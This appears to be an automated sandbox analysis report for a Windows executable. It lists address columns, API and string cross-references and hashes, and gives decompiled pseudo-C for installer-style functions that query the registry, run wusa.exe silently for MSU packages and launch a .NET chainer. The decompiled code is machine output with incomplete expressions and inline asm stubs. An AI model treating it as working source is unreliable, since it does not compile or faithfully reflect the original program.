                                                                                                                                                                  0x0041dcbb
                                                                                                                                                                  0x0041dcbd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dcbf
                                                                                                                                                                  0x0041dcbf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dcbf
                                                                                                                                                                  0x0041dca1
                                                                                                                                                                  0x0041dca1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dca1
                                                                                                                                                                  0x0041dc9f
                                                                                                                                                                  0x0041dc8a
                                                                                                                                                                  0x0041dc47
                                                                                                                                                                  0x0041dc47
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dc47
                                                                                                                                                                  0x0041dc20
                                                                                                                                                                  0x0041dc20
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dc20
                                                                                                                                                                  0x0041dbf4
                                                                                                                                                                  0x0041dbf7
                                                                                                                                                                  0x0041dbf9
                                                                                                                                                                  0x0041de93
                                                                                                                                                                  0x0041de93
                                                                                                                                                                  0x0041de94
                                                                                                                                                                  0x0041de99
                                                                                                                                                                  0x0041dbce
                                                                                                                                                                  0x0041dbce
                                                                                                                                                                  0x0041dbd3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dbd3
                                                                                                                                                                  0x0041dbcc
                                                                                                                                                                  0x0041dbb4
                                                                                                                                                                  0x0041dbb4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dbb4
                                                                                                                                                                  0x0041db93
                                                                                                                                                                  0x0041db93
                                                                                                                                                                  0x0041de19
                                                                                                                                                                  0x0041de19
                                                                                                                                                                  0x0041de1a
                                                                                                                                                                  0x0041de20
                                                                                                                                                                  0x0041de9c
                                                                                                                                                                  0x0041dea0
                                                                                                                                                                  0x0041dea5
                                                                                                                                                                  0x0041dea5
                                                                                                                                                                  0x0041deae
                                                                                                                                                                  0x0041deb3
                                                                                                                                                                  0x0041deb3
                                                                                                                                                                  0x0041debc
                                                                                                                                                                  0x0041dec1
                                                                                                                                                                  0x0041dec1
                                                                                                                                                                  0x0041deca
                                                                                                                                                                  0x0041decf
                                                                                                                                                                  0x0041decf
                                                                                                                                                                  0x0041ded8
                                                                                                                                                                  0x0041dedd
                                                                                                                                                                  0x0041dedd
                                                                                                                                                                  0x0041deec
                                                                                                                                                                  0x0041def1
                                                                                                                                                                  0x0041def3
                                                                                                                                                                  0x0041def3
                                                                                                                                                                  0x0041defb
                                                                                                                                                                  0x0041df00
                                                                                                                                                                  0x0041df02
                                                                                                                                                                  0x0041df02
                                                                                                                                                                  0x0041df0a
                                                                                                                                                                  0x0041df11
                                                                                                                                                                  0x0041df11
                                                                                                                                                                  0x0041df1c

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431D07: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00413C09,0000001C,00000000,00000000,?,?,0040A090), ref: 00431D27
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,wusa.exe,?,00000025,?), ref: 0041DEF1
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,wusa.exe,?,00000025,?), ref: 0041DF00
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to wait for executable to complete: %ls, xrefs: 0041DE8E
                                                                                                                                                                  • Failed to find System32 directory., xrefs: 0041DB93
                                                                                                                                                                  • Failed to get action arguments for MSU package., xrefs: 0041DBD3
                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 0041DBF9
                                                                                                                                                                  • Failed to format MSU install command., xrefs: 0041DC47
                                                                                                                                                                  • "%ls" "%ls" /quiet /norestart, xrefs: 0041DC33
                                                                                                                                                                  • Failed to build MSU path., xrefs: 0041DC20
                                                                                                                                                                  • Failed to format MSU uninstall command., xrefs: 0041DC74
                                                                                                                                                                  • Failed to allocate WUSA.exe path., xrefs: 0041DBB4
                                                                                                                                                                  • Failed to append log path to MSU command-line., xrefs: 0041DCBF
                                                                                                                                                                  • 2, xrefs: 0041DDA0
                                                                                                                                                                  • Failed to get process exit code., xrefs: 0041DE14
                                                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 0041DD82
                                                                                                                                                                  • /log:, xrefs: 0041DC8D
                                                                                                                                                                  • Failed to append log switch to MSU command-line., xrefs: 0041DCA1
                                                                                                                                                                  • Failed to ensure WU service was enabled to install MSU package., xrefs: 0041DD16
                                                                                                                                                                  • D, xrefs: 0041DD3A
                                                                                                                                                                  • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 0041DC60
                                                                                                                                                                  • msuengine.cpp, xrefs: 0041DD75, 0041DE0A, 0041DE37
                                                                                                                                                                  • Bootstrapper application aborted during MSU progress., xrefs: 0041DE41
                                                                                                                                                                  • wusa.exe, xrefs: 0041DBA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$FolderPath
                                                                                                                                                                  • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$msuengine.cpp$wusa.exe
                                                                                                                                                                  • API String ID: 964397404-2130913327
                                                                                                                                                                  • Opcode ID: 6aaf94fd5c13bb8d32033a64c2c76789d4455f13a110851a6b92ec045ce453d3
                                                                                                                                                                  • Instruction ID: ae37ea08d001c07eac2946c6669e57d9ba23b7271864dc9310eade8a562ed6d5
                                                                                                                                                                  • Opcode Fuzzy Hash: 6aaf94fd5c13bb8d32033a64c2c76789d4455f13a110851a6b92ec045ce453d3
                                                                                                                                                                  • Instruction Fuzzy Hash: C4B1BFB0E4071AABEB119FE5CC85BEF77B8AF18305F10002BF601A6151D7BD9994CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040641E, Relevance: 44.1, APIs: 8, Strings: 17, Instructions: 305registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                                  			E0040641E(long _a4, intOrPtr _a8) {
				int _v8;
				char _v12;
				int _v16;
				int _v20;
				int _v24;
				intOrPtr _v32;
				WCHAR* _v40;
				void* __edi;
				signed short _t80;
				signed short _t86;
				void* _t88;
				void* _t90;
				void* _t104;
				long _t107;
				signed short _t111;
				void* _t115;
				WCHAR* _t132;
				long _t140;
				void* _t142;
				void* _t144;
				void* _t145;
				void* _t155;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t140 = _a4;
				_t73 =  !=  ? 0x101 : 1;
				_a4 =  !=  ? 0x101 : 1;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_t132 = 0;
				if(E00403A92(_a8,  *((intOrPtr*)(_t140 + 0x1c)),  &_v12, 0) >= 0) {
					if( *((intOrPtr*)(_t140 + 0x20)) == 0) {
						L5:
						_t142 = E004324D5( *((intOrPtr*)(_t140 + 0x18)), _v12, _a4,  &_v20);
						if(_t142 != 0x80070002) {
							if(_t142 >= 0) {
								_t80 = RegQueryValueExW(_v20, _v16, 0,  &_v24, 0,  &_v8);
								if(_t80 != 2) {
									if(_t80 == 0) {
										_t132 = E00431078(_v8 + 2, 1);
										if(_t132 != 0) {
											_t86 = RegQueryValueExW(_v20, _v16, 0,  &_v24, _t132,  &_v8);
											if(_t86 == 0) {
												_t88 = _v24 - 1;
												if(_t88 == 0) {
													L38:
													_t90 = E00418DBD(_t140,  &_v40, _t132, 0);
													goto L39;
												} else {
													_t104 = _t88 - 1;
													if(_t104 == 0) {
														if( *((intOrPtr*)(_t140 + 0x28)) == 0) {
															goto L38;
														} else {
															_t144 = E00433BDF( &_v40, _v8);
															if(_t144 >= 0) {
																_v32 = 2;
																_t107 = ExpandEnvironmentStringsW(_t132, _v40, _v8);
																_a4 = _t107;
																if(_t107 <= _v8) {
																	goto L40;
																} else {
																	_t145 = E00433BDF( &_v40, _t107);
																	if(_t145 < 0) {
																		goto L33;
																	} else {
																		if(_a4 == ExpandEnvironmentStringsW(_t132, _v40, _a4)) {
																			goto L40;
																		} else {
																			_t111 = GetLastError();
																			_t148 =  <=  ? _t111 : _t111 & 0x0000ffff | 0x80070000;
																			_t145 =  >=  ? 0x80004005 :  <=  ? _t111 : _t111 & 0x0000ffff | 0x80070000;
																			E004300D9(0x80004005, "search.cpp", 0x380, _t145);
																			_push("Failed to get expand environment string.");
																			goto L46;
																		}
																	}
																}
															} else {
																L33:
																_push("Failed to allocate string buffer.");
																goto L46;
															}
														}
													} else {
														_t115 = _t104;
														if(_t115 == 0) {
															if(_v8 != 4) {
																goto L26;
															} else {
																asm("cdq");
																_push(0);
																_push( *_t132);
																goto L28;
															}
														} else {
															if(_t115 == 7) {
																if(_v8 == 8) {
																	_push(_t132[2]);
																	_push( *_t132);
																	L28:
																	_push( &_v40);
																	_t90 = E00418D81();
																	L39:
																	_t144 = _t90;
																	L40:
																	if(_t144 >= 0) {
																		_t145 = E00418B53( &_v40,  *((intOrPtr*)(_t140 + 0x14)));
																		if(_t145 >= 0) {
																			_t145 = E0040465B(_a8,  *((intOrPtr*)(_t140 + 4)),  &_v40, 0);
																			if(_t145 < 0) {
																				_push("Failed to set variable.");
																				goto L46;
																			}
																		} else {
																			_push("Failed to change value type.");
																			goto L46;
																		}
																	} else {
																		_push("Failed to read registry value.");
																		goto L46;
																	}
																} else {
																	L26:
																	_t145 = 0x8000ffff;
																	goto L47;
																}
															} else {
																_t145 = 0x80004001;
																E00430A57(0x80004001, "Unsupported registry key value type. Type = \'%u\'", _v24);
																_t155 = _t155 + 0xc;
																goto L47;
															}
														}
													}
												}
											} else {
												_t151 =  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
												_t145 =  >=  ? 0x80004005 :  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
												E004300D9(0x80004005, "search.cpp", 0x35f, _t145);
												_push("Failed to query registry key value.");
												goto L46;
											}
										} else {
											_t145 = 0x8007000e;
											E004300D9(_t83, "search.cpp", 0x35c, 0x8007000e);
											_push("Failed to allocate memory registry value.");
											_push(0x8007000e);
											E00430A57();
											goto L47;
										}
									} else {
										_t154 =  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
										_t145 =  >=  ? 0x80004005 :  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
										E004300D9(0x80004005, "search.cpp", 0x359, _t145);
										_push("Failed to query registry key value size.");
										goto L46;
									}
								} else {
									_push(_v16);
									E00430F28(_t80, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v12);
									_t155 = _t155 + 0x10;
									goto L7;
								}
							} else {
								_push("Failed to open registry key.");
								goto L46;
							}
						} else {
							E00430F28(2, "Registry key not found. Key = \'%ls\'", _v12);
							_t155 = _t155 + 0xc;
							L7:
							_t145 = E0040465B(_a8,  *((intOrPtr*)(_t140 + 4)),  &_v40, 0);
							if(_t145 >= 0) {
								_t145 = 0;
							} else {
								_push("Failed to clear variable.");
								goto L46;
							}
						}
					} else {
						_t145 = E00403A92(_a8,  *((intOrPtr*)(_t140 + 0x20)),  &_v16, 0);
						if(_t145 >= 0) {
							goto L5;
						} else {
							_push("Failed to format value string.");
							goto L46;
						}
					}
				} else {
					_push("Failed to format key string.");
					L46:
					_push(_t145);
					E00430A57();
					if(_t145 < 0) {
						L47:
						_push(_t145);
						E00430F28(2, "RegistrySearchValue failed: ID \'%ls\', HRESULT 0x%x", _v12);
					}
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				if(_v16 != 0) {
					E004380AB(_v16);
				}
				if(_v20 != 0) {
					RegCloseKey(_v20);
					_v20 = _v20 & 0x00000000;
				}
				if(_t132 != 0) {
					E00431137(_t132);
				}
				E00418E52( &_v40);
				return _t145;
			}

























                                                                                                                                                                  0x0040642c
                                                                                                                                                                  0x0040642d
                                                                                                                                                                  0x0040642e
                                                                                                                                                                  0x00406431
                                                                                                                                                                  0x00406432
                                                                                                                                                                  0x00406440
                                                                                                                                                                  0x00406444
                                                                                                                                                                  0x0040644e
                                                                                                                                                                  0x00406454
                                                                                                                                                                  0x00406457
                                                                                                                                                                  0x0040645a
                                                                                                                                                                  0x0040645d
                                                                                                                                                                  0x00406460
                                                                                                                                                                  0x0040646b
                                                                                                                                                                  0x0040647a
                                                                                                                                                                  0x0040649d
                                                                                                                                                                  0x004064af
                                                                                                                                                                  0x004064b7
                                                                                                                                                                  0x004064f5
                                                                                                                                                                  0x00406519
                                                                                                                                                                  0x0040651e
                                                                                                                                                                  0x00406538
                                                                                                                                                                  0x0040657a
                                                                                                                                                                  0x0040657e
                                                                                                                                                                  0x004065b8
                                                                                                                                                                  0x004065bc
                                                                                                                                                                  0x004065f3
                                                                                                                                                                  0x004065f4
                                                                                                                                                                  0x004066ea
                                                                                                                                                                  0x004066f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004065fa
                                                                                                                                                                  0x004065fa
                                                                                                                                                                  0x004065fb
                                                                                                                                                                  0x00406655
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040665b
                                                                                                                                                                  0x00406667
                                                                                                                                                                  0x0040666b
                                                                                                                                                                  0x0040667a
                                                                                                                                                                  0x00406685
                                                                                                                                                                  0x0040668b
                                                                                                                                                                  0x00406691
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406693
                                                                                                                                                                  0x0040669d
                                                                                                                                                                  0x004066a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004066a3
                                                                                                                                                                  0x004066b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004066b5
                                                                                                                                                                  0x004066b5
                                                                                                                                                                  0x004066c6
                                                                                                                                                                  0x004066d0
                                                                                                                                                                  0x004066de
                                                                                                                                                                  0x004066e3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004066e3
                                                                                                                                                                  0x004066b3
                                                                                                                                                                  0x004066a1
                                                                                                                                                                  0x0040666d
                                                                                                                                                                  0x0040666d
                                                                                                                                                                  0x0040666d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040666d
                                                                                                                                                                  0x0040666b
                                                                                                                                                                  0x004065fd
                                                                                                                                                                  0x004065fe
                                                                                                                                                                  0x004065ff
                                                                                                                                                                  0x00406648
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040664a
                                                                                                                                                                  0x0040664c
                                                                                                                                                                  0x0040664d
                                                                                                                                                                  0x0040664e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040664e
                                                                                                                                                                  0x00406601
                                                                                                                                                                  0x00406604
                                                                                                                                                                  0x00406625
                                                                                                                                                                  0x00406631
                                                                                                                                                                  0x00406634
                                                                                                                                                                  0x00406636
                                                                                                                                                                  0x00406639
                                                                                                                                                                  0x0040663a
                                                                                                                                                                  0x004066f6
                                                                                                                                                                  0x004066f6
                                                                                                                                                                  0x004066f8
                                                                                                                                                                  0x004066fa
                                                                                                                                                                  0x0040670f
                                                                                                                                                                  0x00406713
                                                                                                                                                                  0x0040672d
                                                                                                                                                                  0x00406731
                                                                                                                                                                  0x00406733
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406733
                                                                                                                                                                  0x00406715
                                                                                                                                                                  0x00406715
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406715
                                                                                                                                                                  0x004066fc
                                                                                                                                                                  0x004066fc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004066fc
                                                                                                                                                                  0x00406627
                                                                                                                                                                  0x00406627
                                                                                                                                                                  0x00406627
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406627
                                                                                                                                                                  0x00406606
                                                                                                                                                                  0x00406609
                                                                                                                                                                  0x00406614
                                                                                                                                                                  0x00406619
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406619
                                                                                                                                                                  0x00406604
                                                                                                                                                                  0x004065ff
                                                                                                                                                                  0x004065fb
                                                                                                                                                                  0x004065be
                                                                                                                                                                  0x004065c9
                                                                                                                                                                  0x004065d3
                                                                                                                                                                  0x004065e1
                                                                                                                                                                  0x004065e6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004065e6
                                                                                                                                                                  0x00406580
                                                                                                                                                                  0x00406580
                                                                                                                                                                  0x00406590
                                                                                                                                                                  0x00406595
                                                                                                                                                                  0x0040659a
                                                                                                                                                                  0x0040659b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004065a1
                                                                                                                                                                  0x0040653a
                                                                                                                                                                  0x00406545
                                                                                                                                                                  0x0040654f
                                                                                                                                                                  0x0040655d
                                                                                                                                                                  0x00406562
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406562
                                                                                                                                                                  0x00406520
                                                                                                                                                                  0x00406520
                                                                                                                                                                  0x0040652c
                                                                                                                                                                  0x00406531
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406531
                                                                                                                                                                  0x004064f7
                                                                                                                                                                  0x004064f7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004064f7
                                                                                                                                                                  0x004064b9
                                                                                                                                                                  0x004064c3
                                                                                                                                                                  0x004064c8
                                                                                                                                                                  0x004064cb
                                                                                                                                                                  0x004064dc
                                                                                                                                                                  0x004064e0
                                                                                                                                                                  0x004064ec
                                                                                                                                                                  0x004064e2
                                                                                                                                                                  0x004064e2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004064e2
                                                                                                                                                                  0x004064e0
                                                                                                                                                                  0x0040647c
                                                                                                                                                                  0x0040648d
                                                                                                                                                                  0x00406491
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406493
                                                                                                                                                                  0x00406493
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406493
                                                                                                                                                                  0x00406491
                                                                                                                                                                  0x0040646d
                                                                                                                                                                  0x0040646d
                                                                                                                                                                  0x00406738
                                                                                                                                                                  0x00406738
                                                                                                                                                                  0x00406739
                                                                                                                                                                  0x00406742
                                                                                                                                                                  0x00406744
                                                                                                                                                                  0x00406744
                                                                                                                                                                  0x0040674f
                                                                                                                                                                  0x00406754
                                                                                                                                                                  0x00406742
                                                                                                                                                                  0x0040675b
                                                                                                                                                                  0x00406760
                                                                                                                                                                  0x00406760
                                                                                                                                                                  0x00406769
                                                                                                                                                                  0x0040676e
                                                                                                                                                                  0x0040676e
                                                                                                                                                                  0x00406777
                                                                                                                                                                  0x0040677c
                                                                                                                                                                  0x00406782
                                                                                                                                                                  0x00406782
                                                                                                                                                                  0x00406788
                                                                                                                                                                  0x0040678b
                                                                                                                                                                  0x0040678b
                                                                                                                                                                  0x00406794
                                                                                                                                                                  0x0040679f

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00406462
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00406488
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,?), ref: 0040677C
                                                                                                                                                                  Strings
                                                                                                                                                                  • search.cpp, xrefs: 00406558, 0040658B, 004065DC, 004066D9
                                                                                                                                                                  • Failed to read registry value., xrefs: 004066FC
                                                                                                                                                                  • Failed to allocate string buffer., xrefs: 0040666D
                                                                                                                                                                  • Failed to clear variable., xrefs: 004064E2
                                                                                                                                                                  • Failed to allocate memory registry value., xrefs: 00406595
                                                                                                                                                                  • Failed to query registry key value., xrefs: 004065E6
                                                                                                                                                                  • Failed to change value type., xrefs: 00406715
                                                                                                                                                                  • Failed to query registry key value size., xrefs: 00406562
                                                                                                                                                                  • Failed to format key string., xrefs: 0040646D
                                                                                                                                                                  • Failed to format value string., xrefs: 00406493
                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 00406526
                                                                                                                                                                  • Failed to open registry key., xrefs: 004064F7
                                                                                                                                                                  • Unsupported registry key value type. Type = '%u', xrefs: 0040660E
                                                                                                                                                                  • Failed to set variable., xrefs: 00406733
                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 004064BC
                                                                                                                                                                  • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 00406748
                                                                                                                                                                  • Failed to get expand environment string., xrefs: 004066E3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16$Close
                                                                                                                                                                  • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                                                                                                                  • API String ID: 2348241696-3124384294
                                                                                                                                                                  • Opcode ID: 4c3e6de17e3f97890ed5b4a4f6e03ae96a9e888e58d975e0adf0ca8645c3e1f2
                                                                                                                                                                  • Instruction ID: 8dfd98c8927fa9f7d659e0dd8699b84c02436cc675b37facdf092581e3014735
                                                                                                                                                                  • Opcode Fuzzy Hash: 4c3e6de17e3f97890ed5b4a4f6e03ae96a9e888e58d975e0adf0ca8645c3e1f2
                                                                                                                                                                  • Instruction Fuzzy Hash: 93A1F472D00625BBDF11AAA5CD41BAFBAB8AF08304F124177F901B71D0D779DE109BA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00424C63, Relevance: 44.0, APIs: 10, Strings: 15, Instructions: 277COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                  			E00424C63(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, DWORD* _a20) {
				signed int _v8;
				char _v88;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				struct _SECURITY_ATTRIBUTES* _v120;
				signed short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				struct _PROCESS_INFORMATION _v148;
				intOrPtr _v152;
				DWORD* _v156;
				WCHAR* _v160;
				intOrPtr _v164;
				void* _v168;
				signed int _v172;
				signed short _v176;
				signed int _v180;
				char _v184;
				struct _STARTUPINFOW _v252;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t85;
				signed short _t87;
				signed short _t90;
				signed short _t101;
				signed short _t105;
				signed short _t106;
				long _t120;
				signed short _t124;
				signed short _t125;
				signed short _t128;
				DWORD* _t140;
				signed short _t141;
				void* _t144;
				void* _t148;
				signed short _t157;
				signed short _t160;
				signed short _t163;
				signed int _t164;

				_t144 = __edx;
				_t74 =  *0x4560d0; // 0xae480e18
				_v8 = _t74 ^ _t164;
				_v160 = _a4;
				_v152 = _a8;
				_v128 = _a12;
				_v132 = _a16;
				_v156 = _a20;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t134 = 0;
				_v116 = 0;
				_v108 = 0;
				_v120 = 0;
				_v112 = 0;
				E004267C0(0, __ecx,  &_v104, 0, __eflags);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t85 =  &_v104;
				_v124 = 0;
				__imp__UuidCreate(_t85,  &_v252, 0, 0x44);
				if((_t85 | 0x00000001) >= 0) {
					_t87 =  &_v104;
					__imp__StringFromGUID2(_t87,  &_v88, 0x27);
					__eflags = _t87;
					if(_t87 != 0) {
						_t90 = E00433CEA( &_v108, L"NetFxSection.%ls",  &_v88);
						__eflags = _t90;
						if(_t90 >= 0) {
							__eflags = E00433CEA( &_v116, L"NetFxEvent.%ls",  &_v88);
							if(__eflags >= 0) {
								_t154 = E0042465F(0, __ecx, __eflags, _v108, _v116,  &_v112);
								__eflags = _t154;
								if(_t154 >= 0) {
									_push(_v108);
									_t154 = E00433CEA( &_v120, L"%ls /pipe %ls", _v152);
									__eflags = _t154;
									if(_t154 >= 0) {
										_t147 = _v160;
										_v252.cb = 0x44;
										_t101 = CreateProcessW(_v160, _v120, 0, 0, 0, 0x8000000, 0, 0,  &_v252,  &_v148);
										__eflags = _t101;
										if(_t101 != 0) {
											_t134 = _v112;
											_t147 = WaitForMultipleObjects;
											_v168 = _v148.hProcess;
											_v164 =  *((intOrPtr*)(_v112 + 4));
											while(1) {
												_t105 = WaitForMultipleObjects(2,  &_v168, 0, 0x64);
												__eflags = _t105;
												if(_t105 == 0) {
													break;
												}
												__eflags = _t105 - 1;
												if(_t105 != 1) {
													__eflags = _t105 - 0xffffffff;
													if(_t105 == 0xffffffff) {
														_t106 = GetLastError();
														__eflags = _t106;
														_t157 =  <=  ? _t106 : _t106 & 0x0000ffff | 0x80070000;
														__eflags = _t157;
														_t154 =  >=  ? 0x80004005 : _t157;
														E004300D9(0x80004005, "NetFxChainer.cpp", 0x1ab, _t154);
														_push("Failed to wait for netfx chainer process to complete");
														L20:
														_push(_t154);
														E00430A57();
														L29:
														if(_v108 != 0) {
															E004380AB(_v108);
														}
														if(_v116 != 0) {
															E004380AB(_v116);
														}
														if(_v120 != 0) {
															E004380AB(_v120);
														}
														E0042492E(_t134, _t147, _t134);
														_t148 = CloseHandle;
														if(_v148.hThread != 0) {
															CloseHandle(_v148.hThread);
															_v148.hThread = _v148.hThread & 0x00000000;
														}
														if(_v148.hProcess != 0) {
															CloseHandle(_v148.hProcess);
														}
														return L004267AF(_t154, _v8 ^ _t164, _t148, _t154);
													}
													continue;
												}
												_t154 = E00424B60(_t144, _t134, _v128, _v132);
												__eflags = _t154;
												if(_t154 >= 0) {
													continue;
												}
												_push("Failed to process netfx chainer message.");
												goto L20;
											}
											_t120 = E00424A32(_t134,  &_v124);
											_t140 = _v156;
											 *_t140 = _t120;
											__eflags = _t120 - 0x8000000a;
											if(_t120 != 0x8000000a) {
												_t141 = _v124;
												__eflags = _t141;
												if(_t141 < 0) {
													_t147 =  &_v184;
													asm("stosd");
													asm("stosd");
													asm("stosd");
													asm("stosd");
													_v180 = _v180 & 0x00000000;
													_t55 =  &_v172;
													 *_t55 = _v172 & 0x00000000;
													__eflags =  *_t55;
													_v184 = 1;
													_v176 = _t141;
													_v128( &_v184, _v132);
												}
												goto L29;
											}
											_t124 = GetExitCodeProcess(_v148, _t140);
											__eflags = _t124;
											if(_t124 != 0) {
												goto L29;
											}
											_t125 = GetLastError();
											__eflags = _t125;
											_t160 =  <=  ? _t125 : _t125 & 0x0000ffff | 0x80070000;
											__eflags = _t160;
											_t154 =  >=  ? 0x80004005 : _t160;
											E004300D9(0x80004005, "NetFxChainer.cpp", 0x197, _t154);
											_push("Failed to get netfx return code.");
											goto L20;
										}
										_t128 = GetLastError();
										__eflags = _t128;
										_t163 =  <=  ? _t128 : _t128 & 0x0000ffff | 0x80070000;
										__eflags = _t163;
										_t154 =  >=  ? 0x80004005 : _t163;
										E004300D9(0x80004005, "NetFxChainer.cpp", 0x187,  >=  ? 0x80004005 : _t163);
										E00430A57( >=  ? 0x80004005 : _t163, "Failed to CreateProcess on path: %ls", _t147);
										L15:
										_t134 = _v112;
										goto L29;
									}
									_push("Failed to allocate netfx chainer arguments.");
									L12:
									_push(_t154);
									E00430A57();
									goto L15;
								}
								_push("Failed to create netfx chainer.");
								goto L12;
							}
							_push("Failed to allocate event name.");
							goto L20;
						}
						_push("Failed to allocate section name.");
						goto L20;
					}
					_t154 = 0x8007000e;
					E004300D9(_t87, "NetFxChainer.cpp", 0x175, 0x8007000e);
					_push("Failed to convert netfx chainer guid into string.");
					goto L20;
				}
				_push("Failed to create netfx chainer guid.");
				goto L20;
			}














































                                                                                                                                                                  0x00424c63
                                                                                                                                                                  0x00424c6c
                                                                                                                                                                  0x00424c73
